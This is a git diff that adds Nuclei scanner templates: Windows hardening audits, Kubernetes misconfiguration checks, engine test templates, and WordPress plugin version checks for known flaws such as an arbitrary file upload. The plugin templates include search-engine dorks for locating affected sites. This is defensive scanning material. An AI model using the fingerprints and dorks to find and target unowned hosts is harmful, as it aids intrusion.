unsigned ActiveX controls can lead to the execution of malicious code. + remediation: | + Disable the download and installation of unsigned ActiveX controls. + tags: activex,code-signing,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + $prop = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0' -Name '1004' -ErrorAction SilentlyContinue; if ($null -eq $prop.'1004') { "Property '1004' does not exist" } else { $prop.'1004' } + + matchers: + - type: word + words: + - "1004=0" diff --git a/poc/other/evaluate-variables.yaml b/poc/other/evaluate-variables.yaml new file mode 100644 index 0000000000..f1a6fd98c0 --- /dev/null +++ b/poc/other/evaluate-variables.yaml @@ -0,0 +1,30 @@ +id: dns-ssl-http-with-variables + +info: + name: multi protocol request with dynamic values + author: pdteam + severity: info + + +variables: + cname_filtered: '{{trim_suffix(dns_cname,".ghost.io")}}' + +dns: + - name: "{{FQDN}}" # DNS Request + type: cname + +ssl: + - address: "{{Hostname}}" # ssl request + +http: + - method: GET # http request + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(http_body,'ProjectDiscovery.io') # check for http string + - cname_filtered == 'projectdiscovery' # check for cname (extracted information from dns response) + - ssl_subject_cn == 'blog.projectdiscovery.io' + condition: and \ No newline at end of file diff --git a/poc/other/exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5.yaml b/poc/other/exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5.yaml new file mode 100644 index 0000000000..8dfa91f22c --- /dev/null +++ b/poc/other/exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5.yaml @@ -0,0 +1,59 @@ +id: exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5 + +info: + name: > + Exclusive Addons for Elementor <= 2.7.4 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc931943-13f3-4ab1-b70f-c234253ca269?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/exclusive-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/exclusive-addons-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,exclusive-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/exclusive-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "exclusive-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file diff --git a/poc/other/exported-response-vars.yaml b/poc/other/exported-response-vars.yaml new file mode 100644 index 0000000000..1edfa65f34 --- /dev/null +++ b/poc/other/exported-response-vars.yaml @@ -0,0 +1,26 @@ +id: dns-ssl-http-proto-prefix + +info: + name: multi protocol request with dynamic values + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" # DNS Request + type: cname + +ssl: + - address: "{{Hostname}}" # ssl request + +http: + - method: GET # http request + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(http_body,'ProjectDiscovery.io') # check for http string + - trim_suffix(dns_cname,'.ghost.io') == 'projectdiscovery' # check for cname (extracted information from dns response) + - ssl_subject_cn == 'blog.projectdiscovery.io' + condition: and \ No newline at end of file diff --git a/poc/other/fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c.yaml b/poc/other/fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c.yaml new file mode 100644 index 0000000000..79dfde3155 --- /dev/null +++ b/poc/other/fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c.yaml @@ -0,0 +1,59 @@ +id: fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c + +info: + name: > + FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f79164c2-be3b-496d-b747-3e4b60b7fc2b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/fileorganizer/" + google-query: inurl:"/wp-content/plugins/fileorganizer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,fileorganizer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fileorganizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fileorganizer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.9') \ No newline at end of file diff --git a/poc/other/flow-hide-matcher.yaml b/poc/other/flow-hide-matcher.yaml new file mode 100644 index 0000000000..98bbbdf339 --- /dev/null +++ b/poc/other/flow-hide-matcher.yaml @@ -0,0 +1,29 @@ +id: flow-hide-matcher + +info: + name: Test Flow Hide Matcher + author: pdteam + severity: info + description: In Template any matcher can be marked as internal which hides it from the output. + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - ok + internal: true + + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "Failed event" \ No newline at end of file diff --git a/poc/other/get-hotfix.yaml b/poc/other/get-hotfix.yaml new file mode 100644 index 0000000000..8258bd554e --- /dev/null +++ b/poc/other/get-hotfix.yaml @@ -0,0 +1,27 @@ +id: get-hotfix + +info: + name: List HotFix - Windows + author: pussycat0x + severity: info + description: | + A hotfix in Windows refers to a small, targeted software update issued by Microsoft to address a specific issue or vulnerability in the operating system or software. Hotfixes are typically released to fix critical problems that can't wait for the next scheduled update or service pack. These issues may include security vulnerabilities, stability problems, or bugs that affect the system's performance or functionality. + tags: code,windows,hotfix,ps + +self-contained: true +code: + - engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + - -File + pattern: "*.ps1" + source: | + Get-HotFix + + extractors: + - type: dsl + dsl: + - response diff --git a/poc/other/guest-account-enabled.yaml b/poc/other/guest-account-enabled.yaml new file mode 100644 index 0000000000..e362946162 --- /dev/null +++ b/poc/other/guest-account-enabled.yaml @@ -0,0 +1,32 @@ +id: guest-account-enabled + +info: + name: Guest Account Enabled + author: princechaddha + severity: high + description: Checks if the Guest account is enabled. + impact: | + Enabling the Guest account can allow unauthorized users to access the system with minimal restrictions. + remediation: | + Disable the Guest account to reduce the risk of unauthorized access. + tags: windows,user,account,guest,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + (Get-WmiObject -Class Win32_UserAccount -Filter "Name='Guest' and LocalAccount=True").Disabled + + matchers: + - type: word + words: + - "False" \ No newline at end of file diff --git a/poc/other/headless-1.yaml b/poc/other/headless-1.yaml new file mode 100644 index 0000000000..dfc297d436 --- /dev/null +++ b/poc/other/headless-1.yaml @@ -0,0 +1,15 @@ +id: headless-1 +info: + name: Headless 1 + author: pdteam + severity: info + tags: headless + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}/headless1" + + - action: waitload + \ No newline at end of file diff --git a/poc/other/headless-self-contained.yaml b/poc/other/headless-self-contained.yaml new file mode 100644 index 0000000000..8f83eaf5e9 --- /dev/null +++ b/poc/other/headless-self-contained.yaml @@ -0,0 +1,20 @@ +id: headless-self-contained +info: + name: Headless Self Contained + author: pdteam + severity: info + tags: headless + +self-contained: true + +headless: + - steps: + - action: navigate + args: + url: "https://postman-echo.com/get?q={{query}}" + + - action: waitload + matchers: + - type: word + words: + - "selfcontained" \ No newline at end of file diff --git a/poc/other/headless-waitevent.yaml b/poc/other/headless-waitevent.yaml new file mode 100644 index 0000000000..d5ae94fa8f --- /dev/null +++ b/poc/other/headless-waitevent.yaml @@ -0,0 +1,24 @@ +id: headless-waitevent + +info: + name: WaitEvent + severity: info + author: pdteam + +headless: + - steps: + # note waitevent must be used before navigating to any page + # unlike waitload + - action: waitevent + args: + event: 'Page.loadEventFired' + max-duration: 15s + + - action: navigate + args: + url: "{{BaseURL}}/" + + matchers: + - type: word + words: + - "" \ No newline at end of file diff --git a/poc/other/idle-timeout-Interval.yaml b/poc/other/idle-timeout-Interval.yaml new file mode 100644 index 0000000000..4558421043 --- /dev/null +++ b/poc/other/idle-timeout-Interval.yaml @@ -0,0 +1,26 @@ +id: idle-timeout-interval + +info: + name: Set SSH Idle Timeout Interval + author: pussycat0x + severity: info + description: | + Automatically disconnect idle sessions to reduce the risk of unauthorized access. + remediation: | + Change it to : ClientAliveInterval 300 ,ClientAliveCountMax 0 + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://support.forcepoint.com/s/article/000015900 + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "ClientAliveInterval" + - "ClientAliveCountMax" + negative: true + condition: or \ No newline at end of file diff --git a/poc/other/insecure-cipher-suites-enabled.yaml b/poc/other/insecure-cipher-suites-enabled.yaml new file mode 100644 index 0000000000..728dd1c034 --- /dev/null +++ b/poc/other/insecure-cipher-suites-enabled.yaml @@ -0,0 +1,33 @@ +id: insecure-cipher-suites-enabled + +info: + name: Insecure Cipher Suites Enabled + author: princechaddha + severity: high + description: Checks if insecure cipher suites are enabled. + impact: | + Enabling insecure cipher suites can lead to weak encryption, making it easier for attackers to decrypt sensitive data. + remediation: | + Disable insecure cipher suites such as those using RC4 or DES encryption. + tags: windows,cipher,security,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-TlsCipherSuite | Where-Object { $_.CipherSuite -match "RC4|DES" } + + matchers: + - type: word + words: + - "RC4" + - "DES" diff --git a/poc/other/interactsh-requests-mc-and.yaml b/poc/other/interactsh-requests-mc-and.yaml new file mode 100644 index 0000000000..ea9f037e94 --- /dev/null +++ b/poc/other/interactsh-requests-mc-and.yaml @@ -0,0 +1,27 @@ +id: interactsh-requests-mc-and + +info: + name: interactsh multi request matcher condition + author: pdteam + severity: info + +http: + - raw: + - | + GET /api/geoping/{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: dsl + dsl: + - "status_code_2 == 200" \ No newline at end of file diff --git a/poc/other/iterate-one-value-flow.yaml b/poc/other/iterate-one-value-flow.yaml new file mode 100644 index 0000000000..9ab6633c0c --- /dev/null +++ b/poc/other/iterate-one-value-flow.yaml @@ -0,0 +1,37 @@ +id: flow-iterate-one-value-flow + +info: + name: Test Flow Iterate One Value Flow + author: pdteam + severity: info + description: | + If length of template.extracted variable is not know, i.e it could be an array of 1 or more values, then iterate function + should be used to iterate over values because nuclei by default converts array to string if it has only 1 value. + +flow: | + http(1) + for(let value of iterate(template.extracted)){ + set("value", value) + http(2) + } + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + name: extracted + internal: true + regex: + - "[ok]+" + + - method: GET + path: + - "{{BaseURL}}/{{value}}" + + matchers: + - type: word + words: + - "ok" \ No newline at end of file diff --git a/poc/other/k8s-allow-privilege-escalation-set.yaml b/poc/other/k8s-allow-privilege-escalation-set.yaml new file mode 100644 index 0000000000..81d40e6b4e --- /dev/null +++ b/poc/other/k8s-allow-privilege-escalation-set.yaml @@ -0,0 +1,51 @@ +id: k8s-allow-privilege-escalation-set + +info: + name: Containers run with allowPrivilegeEscalation enabled + author: princechaddha + severity: critical + description: Checks for containers running with the allowPrivilegeEscalation flag enabled, which can increase security risks by allowing privileges to be escalated + impact: | + Enabling allowPrivilegeEscalation in container deployments can result in elevated privileges, potentially allowing attackers to gain further access to host resources. This poses significant security risks. + remediation: Ensure that the allowPrivilegeEscalation flag is set to false in all container configurations to minimize security risks + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,security,devsecops,containers,k8s,k8s-cluster-security +flow: | + code(1); + for (let container of template.items) { + set("container", container) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {pod: .metadata.name, containers: .spec.containers}' + +javascript: + - code: | + let podData = JSON.parse(template.container); + podData.containers.forEach(container => { + if (container.securityContext && container.securityContext.allowPrivilegeEscalation === true) { + let result = (`Container '${container.name}' in pod '${podData.pod}' running with allowPrivilegeEscalation enabled.`); + Export(result); + } + }); + + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100b82b8a61d07a1fd3eb1d4c0e294e1c0ad03620d317280f0708493d3422a9654002207d8421e313c2d1eb9c5c6e0f5efc9193088d15ebe536aa77e70a0104ced336c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-cpu-limits-not-set.yaml b/poc/other/k8s-cpu-limits-not-set.yaml new file mode 100644 index 0000000000..15f6a3468f --- /dev/null +++ b/poc/other/k8s-cpu-limits-not-set.yaml @@ -0,0 +1,50 @@ +id: k8s-cpu-limits-not-set + +info: + name: CPU limits not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing CPU limits in Kubernetes Deployments, which can lead to excessive CPU usage and affect other applications + impact: | + Missing CPU limits in Kubernetes Deployments can cause excessive CPU usage that can starve other applications, leading to performance degradation across the cluster. + remediation: | + Set CPU limits for all containers in Kubernetes Deployments to ensure fair CPU resource distribution and prevent performance issues. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.limits && container.resources.limits.cpu)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks CPU limits.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022064b9824c34dbebcb7d936cbbf3122ceded2d676ef71282c84107d3d18a0602320221008dff215249847ff57a2283c9b3ff4fe970ed648f23817c50be51ecb16994fdb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-cpu-requests-not-set.yaml b/poc/other/k8s-cpu-requests-not-set.yaml new file mode 100644 index 0000000000..23e0d4d441 --- /dev/null +++ b/poc/other/k8s-cpu-requests-not-set.yaml @@ -0,0 +1,50 @@ +id: k8s-cpu-requests-not-set + +info: + name: CPU Requests not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing CPU requests in Kubernetes Deployments, which can lead to inadequate scheduling and resource allocation. + impact: | + Missing CPU requests in Kubernetes Deployments can cause poor scheduling decisions and suboptimal resource allocation, potentially leading to degraded application performance. + remediation: | + Set CPU requests for all containers in Kubernetes Deplayments to ensure efficient scheduling and resource allocation. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.requests && container.resources.requests.cpu)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks CPU requests.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100ce064fde6c02b2150739c4c898294016cbeabcf9da5ae8b4fce69862fb4c0b380220263897bc6d527e5e9ce91b2211864cbb8c373c2e1b168087d5b7b846704a067b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-host-network-namespace-shared.yaml b/poc/other/k8s-host-network-namespace-shared.yaml new file mode 100644 index 0000000000..c254952267 --- /dev/null +++ b/poc/other/k8s-host-network-namespace-shared.yaml @@ -0,0 +1,48 @@ +id: k8s-host-network-namespace-shared + +info: + name: Host Network Namespace Sharing + author: princechaddha + severity: high + description: Checks if containers in Kubernetes Pods are configured to share the host's network namespace, which can lead to security risks. + impact: | + Sharing the host's network namespace allows containers to access the host network directly. This can lead to potential security breaches as containers might bypass network policies and gain unrestricted network access on the host. + remediation: | + Ensure that the 'hostNetwork' field is set to false in all Kubernetes Pods to prevent containers from sharing the host's network namespace. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,namespace,k8s-cluster-security +flow: | + code(1); + for (let pod of template.items) { + set("pod", pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + pod = JSON.parse(template.pod); + if (pod.spec.hostNetwork) { + let result = (`Pod '${pod.metadata.name}' in namespace '${pod.metadata.namespace}' is configured to share the host's network namespace.`); + Export(result); + } + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100d69f9d3352f6245cfa6f8e7d01fe74aa615f86848c9990dee3b7efed9888920e02202a7519d1ba3dc40214389af6146e1486832a051fba6fc79ae13ea45bece0f6ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-host-pid-namespace-sharing.yaml b/poc/other/k8s-host-pid-namespace-sharing.yaml new file mode 100644 index 0000000000..385842e264 --- /dev/null +++ b/poc/other/k8s-host-pid-namespace-sharing.yaml @@ -0,0 +1,48 @@ +id: k8s-host-pid-namespace-sharing + +info: + name: Host PID Namespace Sharing + author: princechaddha + severity: critical + description: Checks if containers in Kubernetes pods share the host's process ID namespace, which can pose a security risk. + impact: | + Sharing the host's PID namespace allows processes within the pod to view all of the processes on the host, potentially leading to privilege escalation and other security vulnerabilities. + remediation: | + Ensure that the 'hostPID' field is set to 'false' in Kubernetes Pod specifications to prevent containers from sharing the host's PID namespace. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,pods,k8s-cluster-security +flow: | + code(1); + for (let pod of template.items) { + set("pod", pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + pod = JSON.parse(template.pod); + if (pod.spec.hostPID) { + let result = (`Pod '${pod.metadata.name}' in namespace '${pod.metadata.namespace}' is sharing the host's PID namespace.`); + Export(result); + } + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100b6c1a589b8b0530b22668279422d9e367506c2e5cbe53392b1e3871175a185300221008a9d26776f8f10fb9f5e02c5649df5da2f2e9b8dd61a6ff295abfba5a3d8f5b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-host-ports-check.yaml b/poc/other/k8s-host-ports-check.yaml new file mode 100644 index 0000000000..d84497df2f --- /dev/null +++ b/poc/other/k8s-host-ports-check.yaml @@ -0,0 +1,51 @@ +id: k8s-host-ports-check + +info: + name: Host ports should not be used + author: princechaddha + severity: medium + description: Checks Kubernetes Deployments to ensure they are not configured to use host ports, which can expose the host to potential security risks. + impact: | + Using host ports can compromise the isolation between the host and the containers, increasing the risk of unauthorized access to host resources. This can lead to security breaches. + remediation: | + Avoid using host ports in Kubernetes Deployments. Use services or other networking mechanisms to expose container applications. + reference: + - https://kubernetes.io/docs/concepts/services-networking/service/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,deployments,k8s,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {name: .metadata.name, namespace: .metadata.namespace, containers: .spec.template.spec.containers}' + +javascript: + - code: | + let deploymentData = JSON.parse(template.deployment); + deploymentData.containers.forEach(container => { + if (container.ports && container.ports.some(port => port.hostPort)) { + let result = (`Deployment '${deploymentData.name}' in namespace '${deploymentData.namespace}' uses host ports.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 490a00463044022011532f20237cf541dbf6f961b6c194239b93619beb27129817c467cd266c48e90220338b47466ecff7995c0c920a541f2ec4bc5d7d062ddaf96260079033ceee08eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-image-pull-policy-always.yaml b/poc/other/k8s-image-pull-policy-always.yaml new file mode 100644 index 0000000000..8832f533b7 --- /dev/null +++ b/poc/other/k8s-image-pull-policy-always.yaml @@ -0,0 +1,49 @@ +id: k8s-image-pull-policy-always + +info: + name: Image Pull Policy set to Always + author: princechaddha + severity: low + description: Ensures that Kubernetes deployments have the image pull policy set to 'Always', which guarantees the most up-to-date version of the image is used. + impact: | + Not setting the image pull policy to 'Always' may cause pods to use outdated versions of images, which can lead to security vulnerabilities if the images contain fixes or updates. + remediation: Update the image pull policy in Kubernetes Deployments to 'Always' to ensure that the latest container images are always used. + reference: + - https://kubernetes.io/docs/concepts/containers/images/#updating-images + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,images,docker,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.every(container => container.imagePullPolicy === 'Always')) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' does not have image pull policy set to Always.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a0047304502202f64c7e602834310b2e9a8c304d75b632cd1588374ae925560e396b61b209068022100c443b2a1a22e5404a2d851928394720efdbed1798415a186e6e0fef8f6001d83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-image-tag-not-fixed.yaml b/poc/other/k8s-image-tag-not-fixed.yaml new file mode 100644 index 0000000000..52c31ebadf --- /dev/null +++ b/poc/other/k8s-image-tag-not-fixed.yaml @@ -0,0 +1,53 @@ +id: k8s-image-tag-not-fixed + +info: + name: Image Tag should be fixed - not latest or blank + author: princechaddha + severity: low + description: Checks if Kubernetes Deployment container images are using tags other than 'latest' or blank, which can lead to unstable and unpredictable deployments. + impact: | + Using 'latest' or blank image tags can result in deploying non-reproducible container images, potentially leading to unexpected application behavior and difficulties in troubleshooting. + remediation: | + Use specific image tags for all containers in Kubernetes Deployments to ensure reproducibility and stability of application deployments. + reference: + - https://kubernetes.io/docs/concepts/containers/images/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + deployment.spec.template.spec.containers.forEach(container => { + const tag = container.image.split(':').pop(); + if (tag === 'latest' || tag === '') { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' uses 'latest' or blank image tag for container '${container.name}'.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a0047304502204c105ff1b822e567af2ce98c74e1e13063716f81e3a93ab2a152fad3c6c58980022100ad676934438a11bcd3abfd6e00f12dd0f05fb4b1eb0dea56546bb3db994ded45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-memory-limits-not-set.yaml b/poc/other/k8s-memory-limits-not-set.yaml new file mode 100644 index 0000000000..2735ea4225 --- /dev/null +++ b/poc/other/k8s-memory-limits-not-set.yaml @@ -0,0 +1,48 @@ +id: k8s-memory-limits-not-set + +info: + name: Memory limits not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing memory limits in Kubernetes Deployments, which can lead to resource contention and instability + impact: | + Missing memory limits in Kubernetes Deployments can cause resource contention and potential application instability. + remediation: Set memory limits for all containers in Kubernetes Deployments to ensure resource management and application stability + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.limits && container.resources.limits.memory)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks memory limits.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 490a00463044022069a4646a0a3d856a79d0af6dc2b73cdd7b2835038feb1d5598a4f86577786994022063f8b629719eefe92da4c7c879e1828b087f04d37360ce743b62305d4f395730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-memory-requests-not-set.yaml b/poc/other/k8s-memory-requests-not-set.yaml new file mode 100644 index 0000000000..9e4b3474cf --- /dev/null +++ b/poc/other/k8s-memory-requests-not-set.yaml @@ -0,0 +1,48 @@ +id: k8s-memory-requests-not-set + +info: + name: Memory requests not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing memory requests in Kubernetes Deployments, which can lead to inefficient scheduling and potential node resource exhaustion. + impact: | + Missing memory requests in Kubernetes Deployments can lead to inefficient pod scheduling, causing potential resource exhaustion on nodes. + remediation: Set memory requests for all containers in Kubernetes Deployments to ensure efficient pod scheduling and node resource utilization. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.requests && container.resources.requests.memory)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks memory requests.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100ae7c1c49b3e8f2afdad758ffeaea087dd5d811cf1b8183d2e4ee53b0dabdc51f0221009e2889066edaae078f4fdf8a31f77e108530839cdab907fa37589501d461773c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-minimize-added-capabilities.yaml b/poc/other/k8s-minimize-added-capabilities.yaml new file mode 100644 index 0000000000..783492dafa --- /dev/null +++ b/poc/other/k8s-minimize-added-capabilities.yaml @@ -0,0 +1,52 @@ +id: minimize-added-capabilities + +info: + name: Minimize container added capabilities + author: princechaddha + severity: high + description: Checks for containers in Kubernetes Deployments with added capabilities beyond the default set, increasing security risks. + impact: | + Containers with additional capabilities are granted more privileges than necessary, potentially allowing them to bypass intended security restrictions. This increases the risk of exploitation and unauthorized access. + remediation: | + Ensure that no unnecessary capabilities are added to containers within Kubernetes Deployments. Use security contexts to define the minimum necessary privileges. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + for (const container of deployment.spec.template.spec.containers) { + if (container.securityContext && container.securityContext.capabilities && container.securityContext.capabilities.add && container.securityContext.capabilities.add.length > 0) { + let addedCaps = container.securityContext.capabilities.add.join(', '); + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' has added capabilities: ${addedCaps}.`); + Export(result); + } + } + + extractors: + - type: dsl + dsl: + - response +# 